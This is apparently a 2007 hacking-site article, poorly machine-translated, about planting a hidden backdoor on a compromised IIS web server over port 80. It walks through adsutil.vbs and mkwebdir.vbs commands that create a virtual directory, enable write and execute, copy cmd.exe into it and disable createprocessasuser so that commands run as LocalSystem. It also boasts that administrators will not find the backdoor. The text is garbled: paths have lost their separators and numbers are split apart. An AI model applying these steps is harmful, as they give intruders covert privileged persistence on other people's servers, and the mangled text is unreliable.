Real IIS always the back door decryption-bug warning-the black bar safety net

ID MYHACK58:62200716691
Type myhack58
Reporter 佚名
Modified 2007-08-27T00:00:00


IIS is more popular in the www server, set the undue vulnerability on the lot. The invasion of the iis server after leaving the back door, since you can always control. Generally the backdoor is open a special Port to monitor, such as a nc,ntlm,rnc, etc. are based on a class telnet mode on the server side listens for the remote connection control. However, a comparison against tight a www site for their administrators to eat terribly after a General through the firewall for the Port to be limiting, thus in addition to the administrator to open the port, the other port cannot be connected. But 8 0 the port is not possible to close if the administrator does not mind it. Then we can By in 8 0 port left the back door to open always back door.

When IIS starts a CGI application, the default used CreateProcessAsUser API to create the CGI of the new Process,the program's security context by the start of the CGI to the user to decide. Generally anonymous users are mapped to the IUSR_computername and this account, of course, be determined by the administrator to other users. Or provided by the browser of a legitimate user. Both the permissions of the user are relatively low, may all belong to the guest group members. In fact, we can modify the iis on CGI way, to improve the permission. We look at the iis main process itself is running in the localsystem account, so we can get the highest localsystem permissions.

Invasionweb server, generally you can bind a cmd to a Port to remotely control the server. Then you can have a GUI remote control, such as 3 3 8 9, or class telnet text mode of the control, such as the rnc. nc is certainly available,in fact this is also sufficient.

1. telnet to the server

2. cscript.exe adsutil. vbs enum w3svc/1/root

KeyType : (STRING) "IIsWebVirtualDir" AppRoot : (STRING) "/LM/W3SVC/1/ROOT" AppFriendlyName : (STRING) "default application" AppIsolated : (INTEGER) 2 AccessRead : (BOOLEAN) True AccessWrite : (BOOLEAN) False AccessExecute : (BOOLEAN) False AccessScript : (BOOLEAN) True AccessSource : (BOOLEAN) False AccessNoRemoteRead : (BOOLEAN) False AccessNoRemoteWrite : (BOOLEAN) False AccessNoRemoteExecute : (BOOLEAN) False AccessNoRemoteScript : (BOOLEAN) False HttpErrors : (LIST) (3 2 Items) "4 0 0,*,FILE,C:WINNThelpiisHelpcommon400.htm" "401,1,FILE,C:WINNThelpiisHelpcommon401-1.htm" "401,2,FILE,C:WINNThelpiisHelpcommon401-2.htm" "401,3,FILE,C:WINNThelpiisHelpcommon401-3.htm" "401,4,FILE,C:WINNThelpiisHelpcommon401-4.htm" "401,5,FILE,C:WINNThelpiisHelpcommon401-5.htm" "403,1,FILE,C:WINNThelpiisHelpcommon403-1.htm" "403,2,FILE,C:WINNThelpiisHelpcommon403-2.htm" "403,3,FILE,C:WINNThelpiisHelpcommon403-3.htm" "403,4,FILE,C:WINNThelpiisHelpcommon403-4.htm" "403,5,FILE,C:WINNThelpiisHelpcommon403-5.htm" "403,6,FILE,C:WINNThelpiisHelpcommon403-6.htm" "403,7,FILE,C:WINNThelpiisHelpcommon403-7.htm" "403,8,FILE,C:WINNThelpiisHelpcommon403-8.htm" "403,9,FILE,C:WINNThelpiisHelpcommon403-9.htm" "403,10,FILE,C:WINNThelpiisHelpcommon403-10.htm" "403,11,FILE,C:WINNThelpiisHelpcommon403-11.htm" "403,12,FILE,C:WINNThelpiisHelpcommon403-12.htm"

"403,13,FILE,C:WINNThelpiisHelpcommon403-13.htm" "403,15,FILE,C:WINNThelpiisHelpcommon403-15.htm" "403,16,FILE,C:WINNThelpiisHelpcommon403-16.htm" "403,17,FILE,C:WINNThelpiisHelpcommon403-17.htm" "4 0 4,,FILE,C:WINNThelpiisHelpcommon404b.htm" "4 0 5,,FILE,C:WINNThelpiisHelpcommon405.htm" "4 0 6,,FILE,C:WINNThelpiisHelpcommon406.htm" "4 0 7,,FILE,C:WINNThelpiisHelpcommon407.htm" "4 1 2,,FILE,C:WINNThelpiisHelpcommon412.htm" "4 1 4,,FILE,C:WINNThelpiisHelpcommon414.htm" "500,12,FILE,C:WINNThelpiisHelpcommon500-12.htm" "500,13,FILE,C:WINNThelpiisHelpcommon500-13.htm" "500,15,FILE,C:WINNThelpiisHelpcommon500-15.htm" "500,100,URL,/iisHelp/common/500-100. asp"

FrontPageWeb : (BOOLEAN) True Path : (STRING) "c:inetpubwwwroot" An : (INTEGER) 5 1 3 [/w3svc/1/root/localstart. asp] [/w3svc/1/root/_vti_pvt] [/w3svc/1/root/_vti_log] [/w3svc/1/root/_private] [/w3svc/1/root/_vti_txt] [/w3svc/1/root/_vti_script] [/w3svc/1/root/_vti_cnf] [/w3svc/1/root/_vti_bin]

Don't tell me you don't know the output above is what!!!!

Now our hearts have a bottom, is not! Oh administrator to be unlucky.

3. mkdir c:inetpubwwwrootdir1 4. cscript.exe mkwebdir. vbs-c MyComputer-w "Default Web Site" -v "Virtual Dir1","c:inetpubwwwrootdir1"

So you set up a virtual directory: Virtual Dir1

You can use 1 command to look at the

5. The next step is to change the Virtual Dir1 attributes for execute

cscript.exe adsutil. vbs set w3svc/1/root/Virtual Dir1/accesswrite "true" -s: cscript.exe adsutil. vbs set w3svc/1/root/Virtual Dir1/accessexecute "true" -s:

Now that you can upload content to the directory, and can be run. 你 也 可以 把 cmd.exe net. exe directly copied to the virtual directory of the disk directory.

6. The following command by modifying the iis metabase to force iis to itself the security environment to create a new CGI process

Cscript adsutil. vbs set /w3svc/1/root/[your directory]/createprocessasuser false

Note: the cscript windows script host.

adsutil. vbs windows iis administration script

Behind is the iis metabase path

So the back door is almost impossible to detect, unless the all of the virtual directory to see it again if the administrator wrote a suicide note, that he would go to the search bar